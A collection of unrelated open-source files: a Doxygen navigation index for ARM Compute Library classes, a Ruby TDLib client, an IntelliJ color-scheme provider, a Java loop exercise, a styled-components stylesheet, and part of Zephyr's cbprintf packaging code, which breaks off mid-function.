"classarm__compute_1_1_c_l_g_e_m_m_transpose1x_w_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,97,1], "classarm__compute_1_1_c_l_gaussian3x3.xhtml":[4,0,0,79], "classarm__compute_1_1_c_l_gaussian3x3.xhtml#a2a829a721f585b9028e9712e71698e69":[4,0,0,79,0], "classarm__compute_1_1_c_l_gaussian3x3_kernel.xhtml":[4,0,0,80], "classarm__compute_1_1_c_l_gaussian3x3_kernel.xhtml#a423f9a45a52983b4de5e2b347f4369c7":[4,0,0,80,0], "classarm__compute_1_1_c_l_gaussian3x3_kernel.xhtml#a67b0c2ccd2c37a8d29fa6cc4b26795d8":[4,0,0,80,1], "classarm__compute_1_1_c_l_gaussian5x5.xhtml":[4,0,0,81], "classarm__compute_1_1_c_l_gaussian5x5.xhtml#a0511911e03b0483fbb38d2610185fab1":[4,0,0,81,0], "classarm__compute_1_1_c_l_gaussian5x5.xhtml#a2a829a721f585b9028e9712e71698e69":[4,0,0,81,1], "classarm__compute_1_1_c_l_gaussian5x5.xhtml#ad1717410afd0be936c6213a63c8005fb":[4,0,0,81,2], "classarm__compute_1_1_c_l_gaussian5x5_hor_kernel.xhtml":[4,0,0,82], "classarm__compute_1_1_c_l_gaussian5x5_hor_kernel.xhtml#a67b0c2ccd2c37a8d29fa6cc4b26795d8":[4,0,0,82,0], "classarm__compute_1_1_c_l_gaussian5x5_vert_kernel.xhtml":[4,0,0,83], "classarm__compute_1_1_c_l_gaussian5x5_vert_kernel.xhtml#a67b0c2ccd2c37a8d29fa6cc4b26795d8":[4,0,0,83,0], "classarm__compute_1_1_c_l_gaussian_pyramid.xhtml":[4,0,0,84], "classarm__compute_1_1_c_l_gaussian_pyramid.xhtml#a0254b4991bee72d364bd7c28cc674db5":[4,0,0,84,0], "classarm__compute_1_1_c_l_gaussian_pyramid.xhtml#a8c57d617c3dd6f7c04c77231dc5928f0":[4,0,0,84,2], "classarm__compute_1_1_c_l_gaussian_pyramid.xhtml#aa3f47917f1cb44a55c93363eaaf39c6e":[4,0,0,84,6], "classarm__compute_1_1_c_l_gaussian_pyramid.xhtml#ab55e57361d83b1cc2514d4b64f2ccec6":[4,0,0,84,1], "classarm__compute_1_1_c_l_gaussian_pyramid.xhtml#ae518f24b88a33e296030407e1a42d5fb":[4,0,0,84,4], "classarm__compute_1_1_c_l_gaussian_pyramid.xhtml#afafbe10da580ab0f3105947cb4a383ac":[4,0,0,84,3], "classarm__compute_1_1_c_l_gaussian_pyramid.xhtml#afc0bb21e48fb78591b51913eba818410":[4,0,0,84,5],
"classarm__compute_1_1_c_l_gaussian_pyramid_half.xhtml":[4,0,0,85], "classarm__compute_1_1_c_l_gaussian_pyramid_half.xhtml#a9f1c2312374125fd95ee145a4f07515c":[4,0,0,85,1], "classarm__compute_1_1_c_l_gaussian_pyramid_half.xhtml#ac2d6975f7677ae5079004191a6a80968":[4,0,0,85,0], "classarm__compute_1_1_c_l_gaussian_pyramid_half.xhtml#ad1717410afd0be936c6213a63c8005fb":[4,0,0,85,2], "classarm__compute_1_1_c_l_gaussian_pyramid_hor_kernel.xhtml":[4,0,0,86], "classarm__compute_1_1_c_l_gaussian_pyramid_hor_kernel.xhtml#a120800657ef56ced788f63cef30c95be":[4,0,0,86,1], "classarm__compute_1_1_c_l_gaussian_pyramid_hor_kernel.xhtml#a423f9a45a52983b4de5e2b347f4369c7":[4,0,0,86,4], "classarm__compute_1_1_c_l_gaussian_pyramid_hor_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,86,8], "classarm__compute_1_1_c_l_gaussian_pyramid_hor_kernel.xhtml#a4da9c0690f6d7852664d5d5efcaa1b84":[4,0,0,86,0], "classarm__compute_1_1_c_l_gaussian_pyramid_hor_kernel.xhtml#a67b0c2ccd2c37a8d29fa6cc4b26795d8":[4,0,0,86,5], "classarm__compute_1_1_c_l_gaussian_pyramid_hor_kernel.xhtml#aab322f707d331394f70405702b43378a":[4,0,0,86,6], "classarm__compute_1_1_c_l_gaussian_pyramid_hor_kernel.xhtml#abfd56453f7a32b56582b212f450aa130":[4,0,0,86,2], "classarm__compute_1_1_c_l_gaussian_pyramid_hor_kernel.xhtml#ae05299dbd8e52799fc34298966f0375d":[4,0,0,86,7], "classarm__compute_1_1_c_l_gaussian_pyramid_hor_kernel.xhtml#aff3525c5fcfeb85912814c1bbbaf0835":[4,0,0,86,3], "classarm__compute_1_1_c_l_gaussian_pyramid_orb.xhtml":[4,0,0,87], "classarm__compute_1_1_c_l_gaussian_pyramid_orb.xhtml#a3039d9b3acf6992402f841a9290338f9":[4,0,0,87,0], "classarm__compute_1_1_c_l_gaussian_pyramid_orb.xhtml#a9f1c2312374125fd95ee145a4f07515c":[4,0,0,87,1], "classarm__compute_1_1_c_l_gaussian_pyramid_orb.xhtml#ad1717410afd0be936c6213a63c8005fb":[4,0,0,87,2], "classarm__compute_1_1_c_l_gaussian_pyramid_vert_kernel.xhtml":[4,0,0,88],
"classarm__compute_1_1_c_l_gaussian_pyramid_vert_kernel.xhtml#a423f9a45a52983b4de5e2b347f4369c7":[4,0,0,88,4], "classarm__compute_1_1_c_l_gaussian_pyramid_vert_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,88,8], "classarm__compute_1_1_c_l_gaussian_pyramid_vert_kernel.xhtml#a4c9a12d347a1d0be990807df7852c905":[4,0,0,88,1], "classarm__compute_1_1_c_l_gaussian_pyramid_vert_kernel.xhtml#a587092ed39eaf708edbaa65e2e656ac3":[4,0,0,88,7], "classarm__compute_1_1_c_l_gaussian_pyramid_vert_kernel.xhtml#a59e56fc7cd5594447db8690011060720":[4,0,0,88,2], "classarm__compute_1_1_c_l_gaussian_pyramid_vert_kernel.xhtml#a67b0c2ccd2c37a8d29fa6cc4b26795d8":[4,0,0,88,5], "classarm__compute_1_1_c_l_gaussian_pyramid_vert_kernel.xhtml#a8e68b8e249e06c5dbecd4f130fa3da54":[4,0,0,88,0], "classarm__compute_1_1_c_l_gaussian_pyramid_vert_kernel.xhtml#abc1512876a55b624d62f83b64efde7dd":[4,0,0,88,3], "classarm__compute_1_1_c_l_gaussian_pyramid_vert_kernel.xhtml#abd272921b9c15f9200c94898879f156a":[4,0,0,88,6], "classarm__compute_1_1_c_l_gradient_kernel.xhtml":[4,0,0,98], "classarm__compute_1_1_c_l_gradient_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,98,4], "classarm__compute_1_1_c_l_gradient_kernel.xhtml#a86852428dd2f3c69bd0639568c2685f8":[4,0,0,98,3], "classarm__compute_1_1_c_l_gradient_kernel.xhtml#a9a6d86fb428ad47df0aa5d8b18cb1d21":[4,0,0,98,1], "classarm__compute_1_1_c_l_gradient_kernel.xhtml#a9fc0a3b7d23e9f71e5f2ea13d51e3c11":[4,0,0,98,0], "classarm__compute_1_1_c_l_gradient_kernel.xhtml#ad67340e556964fbc6aee83f7b2ff8101":[4,0,0,98,2], "classarm__compute_1_1_c_l_h_o_g.xhtml":[4,0,0,104], "classarm__compute_1_1_c_l_h_o_g.xhtml#a055b5bd45e91f842b49def638c017b5b":[4,0,0,104,4], "classarm__compute_1_1_c_l_h_o_g.xhtml#a1468b0adb6ec3f9d38aa7d60b8a91974":[4,0,0,104,2], "classarm__compute_1_1_c_l_h_o_g.xhtml#a14c53d2d17be6fa8a2c9861527c7b002":[4,0,0,104,5], "classarm__compute_1_1_c_l_h_o_g.xhtml#a1ffeb3b5abb3d61f62b58a391816201c":[4,0,0,104,6],
"classarm__compute_1_1_c_l_h_o_g.xhtml#a4de824d64d1e21c5cee52e8d05cd0e58":[4,0,0,104,0], "classarm__compute_1_1_c_l_h_o_g.xhtml#aaa7fa8bba335c51f601110ed2e11eef3":[4,0,0,104,3], "classarm__compute_1_1_c_l_h_o_g.xhtml#afd44a3d7dad6d984b1b87bc9f1b4fa02":[4,0,0,104,1], "classarm__compute_1_1_c_l_h_o_g_block_normalization_kernel.xhtml":[4,0,0,105], "classarm__compute_1_1_c_l_h_o_g_block_normalization_kernel.xhtml#a0325a66cc953500b923a173c049f19ef":[4,0,0,105,3], "classarm__compute_1_1_c_l_h_o_g_block_normalization_kernel.xhtml#a0d45c1b283db50894fafb384393a117d":[4,0,0,105,2], "classarm__compute_1_1_c_l_h_o_g_block_normalization_kernel.xhtml#a2ca01c73542762846c37676789d69b5a":[4,0,0,105,5], "classarm__compute_1_1_c_l_h_o_g_block_normalization_kernel.xhtml#a41cacc3ab4d4d4e7f18cb4e28d8e339b":[4,0,0,105,1], "classarm__compute_1_1_c_l_h_o_g_block_normalization_kernel.xhtml#a493987e85723a8000eb26d1f00e2ad0e":[4,0,0,105,7], "classarm__compute_1_1_c_l_h_o_g_block_normalization_kernel.xhtml#ad76bc03940c8704af97980954867630f":[4,0,0,105,0], "classarm__compute_1_1_c_l_h_o_g_block_normalization_kernel.xhtml#ae2df93f92808deb66ddc274ee9b27307":[4,0,0,105,4], "classarm__compute_1_1_c_l_h_o_g_block_normalization_kernel.xhtml#ae9efd0c575b2ccb193e1ad57026bb08b":[4,0,0,105,6] };
yurijmi/tdlib-ruby
lib/tdlib/client.rb
# Simple client for TDLib.
# @example
#   TD.configure do |config|
#     config.lib_path = 'path_to_tdlibjson'
#     config.encryption_key = 'your_encryption_key'
#
#     config.client.api_id = your_api_id
#     config.client.api_hash = 'your_api_hash'
#   end
#
#   client = TD::Client.new
#
#   begin
#     state = nil
#
#     client.on(TD::Types::Update::AuthorizationState) do |update|
#       state = case update.authorization_state
#               when TD::Types::AuthorizationState::WaitPhoneNumber
#                 :wait_phone_number
#               when TD::Types::AuthorizationState::WaitCode
#                 :wait_code
#               when TD::Types::AuthorizationState::WaitPassword
#                 :wait_password
#               when TD::Types::AuthorizationState::Ready
#                 :ready
#               else
#                 nil
#               end
#     end
#
#     loop do
#       case state
#       when :wait_phone_number
#         puts 'Please, enter your phone number:'
#         phone = STDIN.gets.strip
#         client.set_authentication_phone_number(phone).value
#       when :wait_code
#         puts 'Please, enter code from SMS:'
#         code = STDIN.gets.strip
#         client.check_authentication_code(code).value
#       when :wait_password
#         puts 'Please, enter 2FA password:'
#         password = STDIN.gets.strip
#         client.check_authentication_password(password).value
#       when :ready
#         @me = client.get_me.value
#         break
#       end
#     end
#   ensure
#     client.close
#   end
#
#   p @me
class TD::Client
  include Concurrent
  include TD::ClientMethods

  # Default number of seconds to wait for a TDLib response before timing out.
  TIMEOUT = 20

  # @param td_client [Object] raw TDLib client handle (created by default)
  # @param update_manager [TD::UpdateManager] dispatcher for incoming updates
  # @param extra_config [Hash] per-instance overrides merged over TD.config.client
  def initialize(td_client = TD::Api.client_create,
                 update_manager = TD::UpdateManager.new(td_client),
                 **extra_config)
    @td_client = td_client
    @update_manager = update_manager
    @config = TD.config.client.to_h.merge(extra_config)
    @ready_condition_mutex = Mutex.new
    @ready_condition = ConditionVariable.new
    authorize
    @update_manager.run
  end

  # Sends asynchronous request to the TDLib client and returns Promise object
  # @see TD::ClientMethods List of available queries as methods
  # @see https://www.rubydoc.info/github/ruby-concurrency/concurrent-ruby/Concurrent/Promise
  #   Concurrent::Promise documentation
  # @example
  #   client.broadcast(some_query).then { |result| puts result }.rescue
  # @param [Hash] query
  # @param [Numeric] timeout
  # @return [Concurrent::Promise]
  # @raise [TD::TimeoutError] (inside the promise) when no reply arrives in time
  def broadcast(query, timeout: TIMEOUT)
    Promise.execute do
      condition = ConditionVariable.new
      extra = TD::Utils.generate_extra(query)
      result = nil
      mutex = Mutex.new

      # One-shot handler: TDLib echoes the '@extra' marker back, which is how
      # the reply is matched to this particular request. `return` inside a
      # lambda only exits the lambda, so non-matching updates are skipped.
      handler = ->(update, update_extra) do
        return unless update_extra == extra
        mutex.synchronize do
          result = update
          @update_manager.remove_handler(handler)
          condition.signal
        end
      end

      @update_manager.add_handler(handler)
      query['@extra'] = extra

      mutex.synchronize do
        TD::Api.client_send(@td_client, query)
        condition.wait(mutex, timeout)
        if result.nil?
          # FIX: on timeout the handler used to stay registered forever,
          # leaking one handler per timed-out request. Deregister it before
          # raising so a late reply cannot fire a stale handler.
          @update_manager.remove_handler(handler)
          raise TD::TimeoutError
        end
        result
      end
    end
  end

  # Sends asynchronous request to the TDLib client and returns received update synchronously
  # @param [Hash] query
  # @param [Numeric] timeout
  # @return [Hash]
  def fetch(query, timeout: TIMEOUT)
    broadcast(query, timeout: timeout).value
  end

  alias broadcast_and_receive fetch

  # Synchronously executes TDLib request
  # Only a few requests can be executed synchronously
  # @param [Hash] query
  def execute(query)
    TD::Api.client_execute(@td_client, query)
  end

  # Binds passed block as a handler for updates with type of *update_type*
  # @param [String, Class] update_type
  # @yield [update] yields update to the block as soon as it's received
  # @raise [ArgumentError] if the type cannot be resolved to a TD::Types::Base subclass
  def on(update_type, &_)
    if update_type.is_a?(String)
      # Resolve a plain TDLib type name (e.g. "updateNewMessage") to its class.
      if (type_const = TD::Types::LOOKUP_TABLE[update_type])
        update_type = TD::Types.const_get("TD::Types::#{type_const}")
      else
        raise ArgumentError.new("Can't find class for #{update_type}")
      end
    end

    unless update_type < TD::Types::Base
      raise ArgumentError.new("Wrong type specified (#{update_type}). Should be of kind TD::Types::Base")
    end

    handler = ->(update, _) do
      return unless update.is_a?(update_type)
      yield update
    end

    @update_manager.add_handler(handler)
  end

  # Runs the block once the client has finished the authorization handshake.
  # @param [Numeric] timeout seconds to wait for readiness
  # @raise [TD::TimeoutError] if the client does not become ready in time
  def on_ready(timeout: TIMEOUT, &_)
    @ready_condition_mutex.synchronize do
      # Re-check @ready after the wait: ConditionVariable#wait can return on
      # timeout as well as on broadcast.
      return(yield self) if @ready ||
                            (@ready_condition.wait(@ready_condition_mutex, timeout) && @ready)
      raise TD::TimeoutError
    end
  end

  # Stops update manager and destroys TDLib client
  def close
    @update_manager.stop
    TD::Api.client_destroy(@td_client)
  end

  private

  # Drives the TDLib authorization state machine: supplies parameters and the
  # database encryption key, then flips @ready and wakes any on_ready waiters
  # once any other authorization state is reached.
  def authorize
    handler = ->(update, _) do
      return unless update.is_a?(TD::Types::Update::AuthorizationState)

      case update.authorization_state
      when TD::Types::AuthorizationState::WaitTdlibParameters
        set_tdlib_parameters(TD::Types::TdlibParameters.new(**@config))
      when TD::Types::AuthorizationState::WaitEncryptionKey
        check_database_encryption_key(TD.config.encryption_key)
      else
        # Handshake is past the automated steps; hand control to the user.
        @update_manager.remove_handler(handler)
        @ready_condition_mutex.synchronize do
          @ready = true
          @ready_condition.broadcast
        end
      end
    end

    @update_manager.add_handler(handler)
  end
end
dmarcotte/intellij-community
platform/platform-impl/src/com/intellij/codeStyle/IdeaColorSchemesProvider.java
/* * Copyright 2000-2012 JetBrains s.r.o. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.intellij.codeStyle; import com.intellij.openapi.application.ApplicationManager; import com.intellij.openapi.editor.colors.impl.BundledColorSchemesProvider; import com.intellij.util.PlatformUtils; /** * @author <NAME> */ public class IdeaColorSchemesProvider implements BundledColorSchemesProvider { public static final String[] PATHS = { "/colorSchemes/Darcula" }; @Override public String[] getBundledSchemesRelativePaths() { if (ApplicationManager.getApplication().isUnitTestMode()) return null; if (PlatformUtils.isCommunity() || PlatformUtils.isIdea()) return PATHS; return null; } @Override public String getDefaultSchemaExtensionPath() { return null; } }
lieftsatyamShrivastava/Java_SoftUni
ProgrammingBasics/NestedLoops-Lab/src/SumOfTwoNumbers.java
import java.util.Scanner;

/**
 * Reads three integers from stdin: the start and end of a range and a target
 * number. Enumerates ordered pairs (i, j) with both components in
 * [begin, end], counting each pair as one "combination", and prints the first
 * combination whose sum equals the target. If no pair matches, prints the
 * total number of combinations tried instead.
 *
 * Fixes vs. original: removed a stray non-Java artifact line that broke
 * compilation, and replaced the boolean-flag double-break with an idiomatic
 * labeled break.
 */
public class SumOfTwoNumbers {
    public static void main(String[] args) {
        Scanner scan = new Scanner(System.in);

        int begin = Integer.parseInt(scan.nextLine());
        int end = Integer.parseInt(scan.nextLine());
        int number = Integer.parseInt(scan.nextLine());

        int combination = 0;
        boolean isFound = false;

        // Labeled break exits both loops at once — no flag-checking needed
        // in the outer loop.
        search:
        for (int i = begin; i <= end; i++) {
            for (int j = begin; j <= end; j++) {
                combination++;
                if (i + j == number) {
                    System.out.printf("Combination N:%d (%d + %d = %d)",
                            combination, i, j, number);
                    isFound = true;
                    break search;
                }
            }
        }

        if (!isFound) {
            System.out.printf("%d combinations - neither equals %d", combination, number);
        }
    }
}
ArthurMaciel95/link-share-react
src/components/clip-board-area/styles.js
<gh_stars>1-10
import styled from "styled-components";

// Styled container for the copy-to-clipboard widget: a rounded pill holding
// the (truncated, single-line) link text and a clickable icon area on the
// right. Colors come from CSS custom properties (--primary-color,
// --text-color-gray) defined elsewhere in the app's global styles.
// Below 500px the container stretches to full width.
// NOTE(review): the `button { }` rule inside the media query is empty —
// presumably a leftover; confirm before removing.
export const ClipBoardAreaStyle = styled.div`
  border-radius: 25px;
  max-width: 250px;
  .btn {
    height: 40px;
  }
  p {
    display: flex;
    align-items: center;
    margin: 0px;
    padding: 8px 15px;
    overflow: hidden;
    white-space: nowrap;
    color: var(--text-color-gray);
  }
  .btn p {
    color: var(--primary-color);
  }
  .icon-area {
    background-color: var(--primary-color);
    padding: 15px;
    border-radius: 0px 25px 25px 0px;
    display: flex;
    align-items: center;
    justify-content: center;
    cursor: pointer;
  }

  @media screen and (max-width: 500px) {
    width: 100%;
    max-width: 100%;
    button {
    }
  }
`;
ifyall/zephyr
lib/os/cbprintf_packaged.c
/*
 * Copyright (c) 2021 BayLibre, SAS
 *
 * SPDX-License-Identifier: Apache-2.0
 */

#include <errno.h>
#include <stdarg.h>
#include <stdint.h>
#include <string.h>
#include <linker/utils.h>
#include <sys/cbprintf.h>
#include <sys/types.h>
#include <sys/util.h>
#include <sys/__assert.h>

/**
 * @brief Check if address is in read only section.
 *
 * @param addr Address.
 *
 * @return True if address identified within read only section.
 */
static inline bool ptr_in_rodata(const char *addr)
{
#if defined(CBPRINTF_VIA_UNIT_TEST)
	/* Unit test is X86 (or other host) but not using Zephyr
	 * linker scripts.
	 */
	return false;
#else
	return linker_is_in_rodata(addr);
#endif
}

/*
 * va_list creation
 *
 * Each variant below reconstructs a valid va_list that points at the
 * argument data stored in a package buffer, so the package can be handed
 * to a regular vprintf-style formatter.
 */

#if defined(__CHECKER__)
/* Stub for static analysis runs — never executed. */
static int cbprintf_via_va_list(cbprintf_cb out,
				cbvprintf_exteral_formatter_func formatter,
				void *ctx,
				const char *fmt, void *buf)
{
	return 0;
}
#elif defined(__aarch64__)
/*
 * Reference:
 *
 * Procedure Call Standard for the ARM 64-bit Architecture
 */

struct __va_list {
	void *__stack;
	void *__gr_top;
	void *__vr_top;
	int __gr_offs;
	int __vr_offs;
};

BUILD_ASSERT(sizeof(va_list) == sizeof(struct __va_list),
	     "architecture specific support is wrong");

static int cbprintf_via_va_list(cbprintf_cb out,
				cbvprintf_exteral_formatter_func formatter,
				void *ctx,
				const char *fmt, void *buf)
{
	union {
		va_list ap;
		struct __va_list __ap;
	} u;

	/* create a valid va_list with our buffer */
	u.__ap.__stack = buf;
	u.__ap.__gr_top = NULL;
	u.__ap.__vr_top = NULL;
	u.__ap.__gr_offs = 0;
	u.__ap.__vr_offs = 0;

	return formatter(out, ctx, fmt, u.ap);
}

#elif defined(__x86_64__)
/*
 * Reference:
 *
 * System V Application Binary Interface
 * AMD64 Architecture Processor Supplement
 */

struct __va_list {
	unsigned int gp_offset;
	unsigned int fp_offset;
	void *overflow_arg_area;
	void *reg_save_area;
};

BUILD_ASSERT(sizeof(va_list) == sizeof(struct __va_list),
	     "architecture specific support is wrong");

static int cbprintf_via_va_list(cbprintf_cb out,
				cbvprintf_exteral_formatter_func formatter,
				void *ctx,
				const char *fmt, void *buf)
{
	union {
		va_list ap;
		struct __va_list __ap;
	} u;

	/* create a valid va_list with our buffer */
	u.__ap.overflow_arg_area = buf;
	u.__ap.reg_save_area = NULL;
	/* Offsets past the register-save area force all fetches to come
	 * from overflow_arg_area (i.e. our package buffer).
	 */
	u.__ap.gp_offset = (6 * 8);
	u.__ap.fp_offset = (6 * 8 + 16 * 16);

	return formatter(out, ctx, fmt, u.ap);
}

#elif defined(__xtensa__)
/*
 * Reference:
 *
 * gcc source code (gcc/config/xtensa/xtensa.c)
 * xtensa_build_builtin_va_list(), xtensa_va_start(),
 * xtensa_gimplify_va_arg_expr()
 */

struct __va_list {
	void *__va_stk;
	void *__va_reg;
	int __va_ndx;
};

BUILD_ASSERT(sizeof(va_list) == sizeof(struct __va_list),
	     "architecture specific support is wrong");

static int cbprintf_via_va_list(cbprintf_cb out,
				cbvprintf_exteral_formatter_func formatter,
				void *ctx,
				const char *fmt, void *buf)
{
	union {
		va_list ap;
		struct __va_list __ap;
	} u;

	/* create a valid va_list with our buffer */
	u.__ap.__va_stk = (char *)buf - 32;
	u.__ap.__va_reg = NULL;
	u.__ap.__va_ndx = (6 + 2) * 4;

	return formatter(out, ctx, fmt, u.ap);
}

#else
/*
 * Default implementation shared by many architectures like
 * 32-bit ARM and Intel.
 *
 * We assume va_list is a simple pointer.
 */

BUILD_ASSERT(sizeof(va_list) == sizeof(void *),
	     "architecture specific support is needed");

static int cbprintf_via_va_list(cbprintf_cb out,
				cbvprintf_exteral_formatter_func formatter,
				void *ctx,
				const char *fmt, void *buf)
{
	union {
		va_list ap;
		void *ptr;
	} u;

	u.ptr = buf;

	return formatter(out, ctx, fmt, u.ap);
}

#endif

/* Compute the total size in bytes of a package from its header:
 * buf[0] = argument area length in ints, buf[1] = number of appended
 * strings, buf[2] = number of read-only string position indexes.
 */
static size_t get_package_len(void *packaged)
{
	__ASSERT_NO_MSG(packaged != NULL);

	uint8_t *buf = packaged;
	uint8_t *start = buf;
	unsigned int args_size, s_nbr, ros_nbr;

	args_size = buf[0] * sizeof(int);
	s_nbr = buf[1];
	ros_nbr = buf[2];

	/* Move beyond args. */
	buf += args_size;

	/* Move beyond read-only string indexes array. */
	buf += ros_nbr;

	/* Move beyond strings appended to the package. Each appended string
	 * is prefixed by a 1-byte position index and is null-terminated.
	 */
	for (int i = 0; i < s_nbr; i++) {
		buf++;
		buf += strlen((const char *)buf) + 1;
	}

	return (size_t)(uintptr_t)(buf - start);
}

/* Forward a string (prefixed length, including '\0') to the convert
 * callback, or — when cb is NULL — just return the space it would need
 * (1-byte position prefix + characters, '\0' counted by the caller's use).
 */
static int append_string(cbprintf_convert_cb cb, void *ctx, const char *str,
			 uint16_t strl)
{
	if (cb == NULL) {
		return 1 + strlen(str);
	}

	strl = strl > 0 ? strl : strlen(str) + 1;

	return cb(str, strl, ctx);
}

/* Parse fmt, pull the matching arguments off ap and serialize them into
 * `packaged` (or, with packaged == NULL, compute the needed size). See
 * sys/cbprintf.h for the full public contract and flag semantics.
 */
int cbvprintf_package(void *packaged, size_t len, uint32_t flags,
		      const char *fmt, va_list ap)
{
/*
 * Internally, a byte is used to store location of a string argument within a
 * package. MSB bit is set if string is read-only so effectively 7 bits are
 * used for index, which should be enough.
 */
#define STR_POS_RO_FLAG BIT(7)
#define STR_POS_MASK BIT_MASK(7)

/* Buffer offset abstraction for better code clarity. */
#define BUF_OFFSET ((uintptr_t)buf - (uintptr_t)buf0)

	uint8_t *buf0 = packaged; /* buffer start (may be NULL) */
	uint8_t *buf = buf0; /* current buffer position */
	unsigned int size; /* current argument's size */
	unsigned int align; /* current argument's required alignment */
	uint8_t str_ptr_pos[16]; /* string pointer positions */
	unsigned int s_idx = 0; /* index into str_ptr_pos[] */
	unsigned int s_rw_cnt = 0; /* number of rw strings */
	unsigned int s_ro_cnt = 0; /* number of ro strings */
	unsigned int i;
	const char *s;
	bool parsing = false;
	/* Flag indicates that rw strings are stored as array with positions,
	 * instead of appending them to the package.
	 */
	bool rws_pos_en = !!(flags & CBPRINTF_PACKAGE_ADD_RW_STR_POS);
	/* Get number of first read only strings present in the string.
	 * There is always at least 1 (fmt) but flags can indicate more, e.g
	 * fixed prefix appended to all strings.
	 */
	int fros_cnt = 1 + Z_CBPRINTF_PACKAGE_FIRST_RO_STR_CNT_GET(flags);

	/* Buffer must be aligned at least to size of a pointer. */
	if ((uintptr_t)packaged % sizeof(void *)) {
		return -EFAULT;
	}

#if defined(__xtensa__)
	/* Xtensa requires package to be 16 bytes aligned. */
	if ((uintptr_t)packaged % CBPRINTF_PACKAGE_ALIGNMENT) {
		return -EFAULT;
	}
#endif

	/*
	 * Make room to store the arg list size and the number of
	 * appended strings. They both occupy 1 byte each.
	 *
	 * Given the next value to store is the format string pointer
	 * which is guaranteed to be at least 4 bytes, we just reserve
	 * a pointer size for the above to preserve alignment.
	 */
	buf += sizeof(char *);

	/*
	 * When buf0 is NULL we don't store anything.
	 * Instead we count the needed space to store the data.
	 * In this case, incoming len argument indicates the anticipated
	 * buffer "misalignment" offset.
	 */
	if (buf0 == NULL) {
		buf += len % CBPRINTF_PACKAGE_ALIGNMENT;
		/*
		 * The space to store the data is represented by both the
		 * buffer offset as well as the extra string data to be
		 * appended. When only figuring out the needed space, we
		 * don't append anything. Instead, we reuse the len variable
		 * to sum the size of that data.
		 *
		 * Also, we subtract any initial misalignment offset from
		 * the total as this won't be part of the buffer. To avoid
		 * going negative with an unsigned variable, we add an offset
		 * (CBPRINTF_PACKAGE_ALIGNMENT) that will be removed before
		 * returning.
		 */
		len = CBPRINTF_PACKAGE_ALIGNMENT -
		      (len % CBPRINTF_PACKAGE_ALIGNMENT);
	}

	/*
	 * Otherwise we must ensure we can store at least
	 * the pointer to the format string itself.
	 */
	if (buf0 != NULL && BUF_OFFSET + sizeof(char *) > len) {
		return -ENOSPC;
	}

	/*
	 * Then process the format string itself.
	 * Here we branch directly into the code processing strings
	 * which is in the middle of the following while() loop. That's the
	 * reason for the post-decrement on fmt as it will be incremented
	 * prior to the next (actually first) round of that loop.
	 */
	s = fmt--;
	align = VA_STACK_ALIGN(char *);
	size = sizeof(char *);
	goto process_string;

	/* Scan the format string */
	while (*++fmt != '\0') {
		if (!parsing) {
			if (*fmt == '%') {
				parsing = true;
				align = VA_STACK_ALIGN(int);
				size = sizeof(int);
			}
			continue;
		}
		switch (*fmt) {
		case '%':
			parsing = false;
			continue;

		case '#':
		case '-':
		case '+':
		case ' ':
		case '0':
		case '1':
		case '2':
		case '3':
		case '4':
		case '5':
		case '6':
		case '7':
		case '8':
		case '9':
		case '.':
		case 'h':
		case 'l':
		case 'L':
			continue;

		case '*':
			break;

		case 'j':
			align = VA_STACK_ALIGN(intmax_t);
			size = sizeof(intmax_t);
			continue;

		case 'z':
			align = VA_STACK_ALIGN(size_t);
			size = sizeof(size_t);
			continue;

		case 't':
			align = VA_STACK_ALIGN(ptrdiff_t);
			size = sizeof(ptrdiff_t);
			continue;

		case 'c':
		case 'd':
		case 'i':
		case 'o':
		case 'u':
		case 'x':
		case 'X':
			if (fmt[-1] == 'l') {
				if (fmt[-2] == 'l') {
					align = VA_STACK_ALIGN(long long);
					size = sizeof(long long);
				} else {
					align = VA_STACK_ALIGN(long);
					size = sizeof(long);
				}
			}
			parsing = false;
			break;

		case 's':
		case 'p':
		case 'n':
			align = VA_STACK_ALIGN(void *);
			size = sizeof(void *);
			parsing = false;
			break;

		case 'a':
		case 'A':
		case 'e':
		case 'E':
		case 'f':
		case 'F':
		case 'g':
		case 'G': {
			/*
			 * Handle floats separately as they may be
			 * held in a different register set.
			 */
			union {
				double d;
				long double ld;
			} v;

			if (fmt[-1] == 'L') {
				v.ld = va_arg(ap, long double);
				align = VA_STACK_ALIGN(long double);
				size = sizeof(long double);
			} else {
				v.d = va_arg(ap, double);
				align = VA_STACK_ALIGN(double);
				size = sizeof(double);
			}
			/* align destination buffer location */
			buf = (void *) ROUND_UP(buf, align);
			if (buf0 != NULL) {
				/* make sure it fits */
				if (BUF_OFFSET + size > len) {
					return -ENOSPC;
				}
				if (Z_CBPRINTF_VA_STACK_LL_DBL_MEMCPY) {
					memcpy(buf, &v, size);
				} else if (fmt[-1] == 'L') {
					*(long double *)buf = v.ld;
				} else {
					*(double *)buf = v.d;
				}
			}
			buf += size;
			parsing = false;
			continue;
		}

		default:
			parsing = false;
			continue;
		}

		/* align destination buffer location */
		buf = (void *) ROUND_UP(buf, align);

		/* make sure the data fits */
		if (buf0 != NULL && BUF_OFFSET + size > len) {
			return -ENOSPC;
		}

		/* copy va_list data over to our buffer */
		if (*fmt == 's') {
			s = va_arg(ap, char *);
process_string:
			if (buf0 != NULL) {
				*(const char **)buf = s;
			}

			bool is_ro = (fros_cnt-- > 0) ? true : ptr_in_rodata(s);
			bool do_ro = !!(flags & CBPRINTF_PACKAGE_ADD_RO_STR_POS);

			if (is_ro && !do_ro) {
				/* nothing to do */
			} else {
				uint32_t s_ptr_idx = BUF_OFFSET / sizeof(int);

				/*
				 * In the do_ro case we must consider
				 * room for possible STR_POS_RO_FLAG.
				 * Otherwise the index range is 8 bits
				 * and any overflow is caught later.
				 */
				if (do_ro && s_ptr_idx > STR_POS_MASK) {
					__ASSERT(false, "String with too many arguments");
					return -EINVAL;
				}

				if (s_idx >= ARRAY_SIZE(str_ptr_pos)) {
					__ASSERT(false, "str_ptr_pos[] too small");
					return -EINVAL;
				}

				if (buf0 != NULL) {
					/*
					 * Remember string pointer location.
					 * We will append non-ro strings later.
					 */
